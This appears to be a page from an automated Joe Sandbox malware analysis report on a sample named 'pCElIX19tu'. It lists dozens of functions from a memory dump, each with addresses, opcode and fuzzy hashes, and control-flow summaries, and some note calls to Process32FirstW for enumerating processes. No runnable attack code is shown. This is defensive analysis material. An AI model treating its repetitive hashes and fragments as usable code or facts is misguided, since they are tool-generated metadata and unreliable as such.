                                                            • Opcode ID: cc3a6cc5dedf8e494dcffbeaf1413c8f518520eab75d1b6496d3a6993daf1f4d
                                                            • Instruction ID: d90adc15080d723a4d15d277b4fe451624973cdbf64780bb3eef8b63bf6cd75a
                                                            • Opcode Fuzzy Hash: cc3a6cc5dedf8e494dcffbeaf1413c8f518520eab75d1b6496d3a6993daf1f4d
                                                            • Instruction Fuzzy Hash: FED1F0FB26C223BDB94281862F54AFA6B6EE6D7730B308037F807D6542E3944E4B5171
                                                            Function 076900C6 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 636COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557263678.0000000007690000.00000040.00001000.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7690000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `
                                                            • API String ID: 0-934871106
                                                            • Opcode ID: cd06446dae22e04ec33cec6053ea6671cbeffc5f13ddaac1cb52930a44bf8ff1
                                                            • Instruction ID: da77ca4de35392a20b7fa778f4dba34be5ea03ebf1e431b8ff520e13432324a6
                                                            • Opcode Fuzzy Hash: cd06446dae22e04ec33cec6053ea6671cbeffc5f13ddaac1cb52930a44bf8ff1
                                                            • Instruction Fuzzy Hash: 09D1DDFB26C223BDB94281866B54AFB6B6EE6C7730B308437F807D6542E3944E4B5171
                                                            Function 076900A2 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 636COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557263678.0000000007690000.00000040.00001000.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7690000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `
                                                            • API String ID: 0-934871106
                                                            • Opcode ID: 02234f0b7867803893379046e44ad42080dfeac6e7c86fa77c5732149ecbbf3c
                                                            • Instruction ID: fd33f7f9e6c8c2a665c031de46a8cc0e0f66977b0d90e34e2795a8fe60ea951b
                                                            • Opcode Fuzzy Hash: 02234f0b7867803893379046e44ad42080dfeac6e7c86fa77c5732149ecbbf3c
                                                            • Instruction Fuzzy Hash: 96D1EFFB26C223BDB94281866B54AFB6B6EE6C7730B308437F807D6542E3944E4B5171
                                                            Function 076900F0 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 634COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1135 76900f0-76900f4 1136 76900b9-76900eb 1135->1136 1137 76900f6-769045e call 76902ea 1135->1137 1136->1137 1176 769046e-76904a5 Process32FirstW 1137->1176 1178 76904be-7690539 call 769052a call 769053c 1176->1178 1186 769053b-7690586 1178->1186 1187 7690587-769069f 1178->1187 1186->1187 1203 76906a0-76906e0 call 76906e5 1187->1203 1209 76906e2-7690a0a call 76907ae call 76909d8 call 7690a12 1203->1209
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557263678.0000000007690000.00000040.00001000.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7690000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `
                                                            • API String ID: 0-934871106
                                                            • Opcode ID: e2703027e0445362ed122dcbe82136d6b89214cbf98c2cf3e9ee777570943e46
                                                            • Instruction ID: 819266eb3234887df429cb2efd514cea51bc1ffc79774e0e29bece4cd7a3d883
                                                            • Opcode Fuzzy Hash: e2703027e0445362ed122dcbe82136d6b89214cbf98c2cf3e9ee777570943e46
                                                            • Instruction Fuzzy Hash: 06D1DFFB26C223BDB94281866B54AFB6B6EE6C7730B308437F807D6542E3944E4B5171
                                                            Function 076900B2 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 634COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557263678.0000000007690000.00000040.00001000.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7690000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `
                                                            • API String ID: 0-934871106
                                                            • Opcode ID: e745eb35dc01b5ae0e479cc4764de04d5b73c86693808823c2f9ec628592d8a3
                                                            • Instruction ID: ad7266069b3e5dc6d7be983d02591ad5cd2a106005dd0e634c651d44f97ba526
                                                            • Opcode Fuzzy Hash: e745eb35dc01b5ae0e479cc4764de04d5b73c86693808823c2f9ec628592d8a3
                                                            • Instruction Fuzzy Hash: BBD1DEFB26C223BDB94281866B54AFA6B6EE6C7730B308437F807D6542E3944E4B5171
                                                            Function 076900FE Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 617COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1245 76900fe-769010f 1246 769013c-7690144 1245->1246 1247 7690111-7690135 1245->1247 1248 7690146-769045e call 76902ea 1246->1248 1247->1248 1284 769046e-76904a5 Process32FirstW 1248->1284 1286 76904be-7690539 call 769052a call 769053c 1284->1286 1294 769053b-7690586 1286->1294 1295 7690587-769069f 1286->1295 1294->1295 1311 76906a0-76906e0 call 76906e5 1295->1311 1317 76906e2-7690a0a call 76907ae call 76909d8 call 7690a12 1311->1317
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557263678.0000000007690000.00000040.00001000.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7690000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `
                                                            • API String ID: 0-934871106
                                                            • Opcode ID: 05a25f7a80d571a7aa3295f8326188792cf622198e895d7ba3e393008ae3cbfc
                                                            • Instruction ID: 3f2af30b7cd5cbb1a9d1389561a0f08bb1df2263e00d8a67282c97c05c9c2686
                                                            • Opcode Fuzzy Hash: 05a25f7a80d571a7aa3295f8326188792cf622198e895d7ba3e393008ae3cbfc
                                                            • Instruction Fuzzy Hash: 96C1F2FB26C123BDB94281866B54AFB6B6EE6C7730B308437F807D6542E3944E4B5171
                                                            Function 07690122 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 610COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1353 7690122-7690140 1354 7690121 1353->1354 1355 7690142-769045e call 76902ea 1353->1355 1354->1353 1391 769046e-76904a5 Process32FirstW 1355->1391 1393 76904be-7690539 call 769052a call 769053c 1391->1393 1401 769053b-7690586 1393->1401 1402 7690587-769069f 1393->1402 1401->1402 1418 76906a0-76906e0 call 76906e5 1402->1418 1424 76906e2-7690a0a call 76907ae call 76909d8 call 7690a12 1418->1424
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557263678.0000000007690000.00000040.00001000.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7690000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `
                                                            • API String ID: 0-934871106
                                                            • Opcode ID: 81493355b33ce75a280de3c6cca632f6ad777b92a3d5fdc8ac7f23b97f579562
                                                            • Instruction ID: bb677f5d4ddd3ac40afd9c12528d08c8429578416adef844e451fbfc7dec9e5f
                                                            • Opcode Fuzzy Hash: 81493355b33ce75a280de3c6cca632f6ad777b92a3d5fdc8ac7f23b97f579562
                                                            • Instruction Fuzzy Hash: 63C104FB26C123BDBA4281856F54AFA6B6EE6C7730B308437F807D6542E3944E4B5171
                                                            Function 076901E2 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 601COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1460 76901e2-76901e3 1461 76901ef-76901f5 1460->1461 1462 76901e5 1460->1462 1465 76901f6-769045e call 76902ea 1461->1465 1463 769017f-76901dd 1462->1463 1464 76901e7-76901eb 1462->1464 1463->1465 1464->1461 1497 769046e-76904a5 Process32FirstW 1465->1497 1499 76904be-7690539 call 769052a call 769053c 1497->1499 1507 769053b-7690586 1499->1507 1508 7690587-769069f 1499->1508 1507->1508 1524 76906a0-76906e0 call 76906e5 1508->1524 1530 76906e2-7690a0a call 76907ae call 76909d8 call 7690a12 1524->1530
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557263678.0000000007690000.00000040.00001000.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7690000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `
                                                            • API String ID: 0-934871106
                                                            • Opcode ID: 5df9070cebc5cbedcef355e88522e6366b394a5c1ea7adf1cf757b040fb69bca
                                                            • Instruction ID: 5274ba642c7cf7f696ee40627c2d42cd7f0cdb5959eac49bbca10a4f3213ffb3
                                                            • Opcode Fuzzy Hash: 5df9070cebc5cbedcef355e88522e6366b394a5c1ea7adf1cf757b040fb69bca
                                                            • Instruction Fuzzy Hash: 67C112FB26C223BDB94281866B54AFB6B6EE6C3730B308437F807D6542E3944E4B5071
                                                            Function 0769015E Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 592COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557263678.0000000007690000.00000040.00001000.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7690000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `
                                                            • API String ID: 0-934871106
                                                            • Opcode ID: d908db1a3b2d4f525199d677d1346f7c46a56e9e1912a5b1ceafe8ab605f3ac4
                                                            • Instruction ID: 4c890e277ddf399ff50c31e85b0e7d969ae262e1071c398bbbf7598ffda6ac45
                                                            • Opcode Fuzzy Hash: d908db1a3b2d4f525199d677d1346f7c46a56e9e1912a5b1ceafe8ab605f3ac4
                                                            • Instruction Fuzzy Hash: 93C1EFFB26C223BDB94281866B54AFB6B6EE6C7730B308437F807D6542E3944E4B5171
                                                            Function 0769017D Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 591COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557263678.0000000007690000.00000040.00001000.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7690000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `
                                                            • API String ID: 0-934871106
                                                            • Opcode ID: 9b26dbb841b011105d31e532d864a8d3344f95fc274e5d259c913707e197154d
                                                            • Instruction ID: b105f6d3e66d4fd90fefc47cdefe5e8217504e96aa7cfaeddbccfe4a9e3afffe
                                                            • Opcode Fuzzy Hash: 9b26dbb841b011105d31e532d864a8d3344f95fc274e5d259c913707e197154d
                                                            • Instruction Fuzzy Hash: 2CC1C1FB26C223BDB94281866F54AFA6B6EE6C7730B308437F807D6542E3944E4B5171
                                                            Function 07690163 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 590COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557263678.0000000007690000.00000040.00001000.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7690000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `
                                                            • API String ID: 0-934871106
                                                            • Opcode ID: 07f846c79aa85dff3886ce36de053c9ef0f40c33e4a65ef4e5cc24d9858d6465
                                                            • Instruction ID: 04fe622bfb2556c3f91a90141772f096c1f7f75e1d8d1a3de39f8806e2f094bf
                                                            • Opcode Fuzzy Hash: 07f846c79aa85dff3886ce36de053c9ef0f40c33e4a65ef4e5cc24d9858d6465
                                                            • Instruction Fuzzy Hash: 4EC1F0FB26C223BDB94281866B54AFB6B6EE6C7730B308437F807D6542E3944E4B5171
                                                            Function 07690154 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 590COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557263678.0000000007690000.00000040.00001000.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7690000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `
                                                            • API String ID: 0-934871106
                                                            • Opcode ID: 29d49705db53b683f0660ec787c8e2b3ec72b9039d19f0f112cf368b3d6f0cd0
                                                            • Instruction ID: d5de5b3b82a7210fcb94714d886d3c0934cfec481f92e776666daa572b0f7230
                                                            • Opcode Fuzzy Hash: 29d49705db53b683f0660ec787c8e2b3ec72b9039d19f0f112cf368b3d6f0cd0
                                                            • Instruction Fuzzy Hash: 62C1EFFB26C223BDB94281866B54AFB6B6EE6C7730B308437F807D6542E3944E4B5171
                                                            Function 0769019D Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 583COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557263678.0000000007690000.00000040.00001000.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7690000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `
                                                            • API String ID: 0-934871106
                                                            • Opcode ID: 621ed4b695b7f95d2695007f490bbaac1cccce8af78fa05828121108608f91b7
                                                            • Instruction ID: 0d102add85e507cbf48d0d1d53312088bec5d908cc6fa099c3c75095d07da052
                                                            • Opcode Fuzzy Hash: 621ed4b695b7f95d2695007f490bbaac1cccce8af78fa05828121108608f91b7
                                                            • Instruction Fuzzy Hash: B7C1E2FB26C223BDB94281866F14AFA6B6EE6C7730B308437F807D6542E3944E4B5171
                                                            Function 076901C8 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 580COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557263678.0000000007690000.00000040.00001000.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7690000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `
                                                            • API String ID: 0-934871106
                                                            • Opcode ID: e6d6225d66296b07e0f6e8a08d4bd4077b3ffa520b97fad2629a939783a28d19
                                                            • Instruction ID: bb6d94124684194eb4fb57f644b44830537cbd3a195de93a4b193aa11235aa1e
                                                            • Opcode Fuzzy Hash: e6d6225d66296b07e0f6e8a08d4bd4077b3ffa520b97fad2629a939783a28d19
                                                            • Instruction Fuzzy Hash: 65C1E0FB26C223BDB94281866B54AFA677EE6C7730B308437F807D6542E3944E4B5171
                                                            Function 076901B2 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 580COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557263678.0000000007690000.00000040.00001000.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7690000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `
                                                            • API String ID: 0-934871106
                                                            • Opcode ID: 250b914b9d7f4993d8150e58d02c5041dde335d57a6f3162be31d14d7f3bcee3
                                                            • Instruction ID: 844f8065c3ebfeba403cd84063feaa32fdf23d8002689603d0b5870dd06a225f
                                                            • Opcode Fuzzy Hash: 250b914b9d7f4993d8150e58d02c5041dde335d57a6f3162be31d14d7f3bcee3
                                                            • Instruction Fuzzy Hash: BCC1D0FB26C123BDB94281866F54AFAA76EE6C7730B308437F807D6542E3944E4B5171
                                                            Function 07690201 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 570COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557263678.0000000007690000.00000040.00001000.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7690000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `
                                                            • API String ID: 0-934871106
                                                            • Opcode ID: 6db651926162f47f6e606d4f924e0940747da765322cfad1396e31241cb97cc1
                                                            • Instruction ID: eb8996de532b6b144a0e3adca6c123277ad2fb0defd767598a744d28e41fd7fe
                                                            • Opcode Fuzzy Hash: 6db651926162f47f6e606d4f924e0940747da765322cfad1396e31241cb97cc1
                                                            • Instruction Fuzzy Hash: 21B1D0FB26C223BDB94281856B54AFB676EE6C7730B308437F807D6542E3944E4B5171
                                                            Function 07690223 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 558COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557263678.0000000007690000.00000040.00001000.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7690000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `
                                                            • API String ID: 0-934871106
                                                            • Opcode ID: 61db367dbe52556ffd7f8f6f5150932e65d06552c3e919004ba63043f56a6589
                                                            • Instruction ID: 93888a3edb28773794165fb4b3b8a004848862903f8e5dc9b2e3aa629c39032d
                                                            • Opcode Fuzzy Hash: 61db367dbe52556ffd7f8f6f5150932e65d06552c3e919004ba63043f56a6589
                                                            • Instruction Fuzzy Hash: 22B1D1FB26C223BDB94281866B54AFAA76EE6C7730B308437F807D6542E3944E4F5171
                                                            Function 07690290 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 517COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557263678.0000000007690000.00000040.00001000.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7690000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `
                                                            • API String ID: 0-934871106
                                                            • Opcode ID: ffab17c3dc79f0c9768db97b75a9c533e8c3bd0f45e315e0fb33a5dd4c76dfda
                                                            • Instruction ID: 6c2e12457837ad799d648d6ea842a1e0834d8dad8b4af8fc1621ab4c8693656e
                                                            • Opcode Fuzzy Hash: ffab17c3dc79f0c9768db97b75a9c533e8c3bd0f45e315e0fb33a5dd4c76dfda
                                                            • Instruction Fuzzy Hash: 3DB1E2FB26C123BDB94291856F54AFAA72EE6C7730B308437F807D6542E3944E4B5171
                                                            Function 076902A8 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 510COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557263678.0000000007690000.00000040.00001000.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7690000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `
                                                            • API String ID: 0-934871106
                                                            • Opcode ID: 3b7151997ef12f62bb0de433b937d15e122e28d4b689f10acfc913e4527f7c6a
                                                            • Instruction ID: 2cfa1fd906277c8c054c35eed5f4b65856dd05894185a47ca58e413e8da83be3
                                                            • Opcode Fuzzy Hash: 3b7151997ef12f62bb0de433b937d15e122e28d4b689f10acfc913e4527f7c6a
                                                            • Instruction Fuzzy Hash: 65A1F2FB26C123BDB94291866F54AFAAB2EE6C7730B308437F807D6542E3944E4B5171
                                                            Function 076902BD Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 508COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557263678.0000000007690000.00000040.00001000.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7690000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `
                                                            • API String ID: 0-934871106
                                                            • Opcode ID: fa20e13572b68fe4df670f47dbeaa0d834ea374675fb106d09d6e367efb3760d
                                                            • Instruction ID: 4b36ac81174db763fbeb570ea756c2ad22302b03c73cb9d6b74839890dc35499
                                                            • Opcode Fuzzy Hash: fa20e13572b68fe4df670f47dbeaa0d834ea374675fb106d09d6e367efb3760d
                                                            • Instruction Fuzzy Hash: D4A1F1FB26C123BDB94291856F54AFAAB2EE6C7730B308437F807D6542E3944E4B5171
                                                            Function 076902CC Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 504COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557263678.0000000007690000.00000040.00001000.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7690000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `
                                                            • API String ID: 0-934871106
                                                            • Opcode ID: 381d640e81123b88b57305ab3c80ce5e7ce8c44520fecd2ff67ffb07ec3d20cf
                                                            • Instruction ID: 37d4d855f328e6aa7e98ba550805f4620f7a2fd57174e995d213307787a8aaa3
                                                            • Opcode Fuzzy Hash: 381d640e81123b88b57305ab3c80ce5e7ce8c44520fecd2ff67ffb07ec3d20cf
                                                            • Instruction Fuzzy Hash: 17A103FB26C123BDB94291856F54AFAAB6EE6C7730B30843BF807D6542E3844E4B5171
                                                            Function 076902F1 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 498COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557263678.0000000007690000.00000040.00001000.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7690000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `
                                                            • API String ID: 0-934871106
                                                            • Opcode ID: ed36d2539b2e5a319fd3de40522e612f0bda5e75dc228eef8f284e109e094a5b
                                                            • Instruction ID: 1e337f2fd6841d0934590802a01c009f36034c087b66620c51c6637517250c26
                                                            • Opcode Fuzzy Hash: ed36d2539b2e5a319fd3de40522e612f0bda5e75dc228eef8f284e109e094a5b
                                                            • Instruction Fuzzy Hash: 86A1E1EB26C123BDB94291856F54AFA6B6EE6C7730B30843BF807D6542E3844E4F5171
                                                            Function 07690305 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 491COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32FirstW.KERNEL32(?,?,?,?), ref: 07690498
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557263678.0000000007690000.00000040.00001000.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7690000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID: `
                                                            • API String ID: 2623510744-934871106
                                                            • Opcode ID: 006603cf1f2e203cecd6c5f02e957da1665610f9a2a7de1f4729e20210ffb97f
                                                            • Instruction ID: 1b85cdb000d6d4fd84f94fd78fddb554b8a8732b73bc2520650eb7676975fd3b
                                                            • Opcode Fuzzy Hash: 006603cf1f2e203cecd6c5f02e957da1665610f9a2a7de1f4729e20210ffb97f
                                                            • Instruction Fuzzy Hash: BDA1E2FB26C123BCB94291856B54AFAA76EE6C7730B308437F807D6542E3944E4F5171
                                                            Function 07690358 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 487COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32FirstW.KERNEL32(?,?,?,?), ref: 07690498
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557263678.0000000007690000.00000040.00001000.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7690000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID: `
                                                            • API String ID: 2623510744-934871106
                                                            • Opcode ID: 7657fcff34a0a09789094390dfc0bf315f60b7def138de717ce580e8c37e2b6c
                                                            • Instruction ID: 576d1ac176adef7b942e9afeb36ae193e86f234e550c0ebc91d6332e0358068b
                                                            • Opcode Fuzzy Hash: 7657fcff34a0a09789094390dfc0bf315f60b7def138de717ce580e8c37e2b6c
                                                            • Instruction Fuzzy Hash: E0A102FB26C123BDB94291856B54AFA6B2EE6C7730B308437F807D6502E3844E4F5171
                                                            Function 07690318 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 484COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32FirstW.KERNEL32(?,?,?,?), ref: 07690498
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557263678.0000000007690000.00000040.00001000.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7690000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID: `
                                                            • API String ID: 2623510744-934871106
                                                            • Opcode ID: d0639c7d91abc0e21cad408b9932e1db28e5530539d48cea1fc0ed5886b12c08
                                                            • Instruction ID: 3b6ba33fc18d51a7fda78a4a371985e30600facdaa75b95705cc4d15ee695829
                                                            • Opcode Fuzzy Hash: d0639c7d91abc0e21cad408b9932e1db28e5530539d48cea1fc0ed5886b12c08
                                                            • Instruction Fuzzy Hash: F4A1E1FB26C123BCB94291866B54AFA6B6EE6C7730B308437F807D6542E3944E4F5171
                                                            Function 07690336 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 476COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32FirstW.KERNEL32(?,?,?,?), ref: 07690498
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557263678.0000000007690000.00000040.00001000.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7690000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID: `
                                                            • API String ID: 2623510744-934871106
                                                            • Opcode ID: 8f617b08f6fa6dbd4e6907c0ca00f10b31da1b1a4dc6eb1fe09b7c7530d941e7
                                                            • Instruction ID: 09877d11a495501af0222ba481d14f36bfe8eb1b178eff43880a570739749a3a
                                                            • Opcode Fuzzy Hash: 8f617b08f6fa6dbd4e6907c0ca00f10b31da1b1a4dc6eb1fe09b7c7530d941e7
                                                            • Instruction Fuzzy Hash: EFA112FB26C223BCB90291856B54AFA6B6EE6C7730B308437F807D6542E3944E4B51B1
                                                            Function 07690377 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 467COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32FirstW.KERNEL32(?,?,?,?), ref: 07690498
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557263678.0000000007690000.00000040.00001000.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7690000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID: `
                                                            • API String ID: 2623510744-934871106
                                                            • Opcode ID: 09a8062ac814682d677406f43d8158c4d0350afe8f60f87eacf2692e1be2d800
                                                            • Instruction ID: bae5a608323de018070711bd18eeea86f66b337e3383e3a6dc5505c0b3095a4f
                                                            • Opcode Fuzzy Hash: 09a8062ac814682d677406f43d8158c4d0350afe8f60f87eacf2692e1be2d800
                                                            • Instruction Fuzzy Hash: 2F91F2EB25C223BDBA4291956B54AFAAB6EE5C7730B30843BF807D6503E3844E4F5171
                                                            Function 076903D1 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 444COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32FirstW.KERNEL32(?,?,?,?), ref: 07690498
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557263678.0000000007690000.00000040.00001000.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7690000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID: `
                                                            • API String ID: 2623510744-934871106
                                                            • Opcode ID: b42d5f8031f4ff6b408edb4a7aa524de9eb734c96fcbaa0f4910c5ca4befffbf
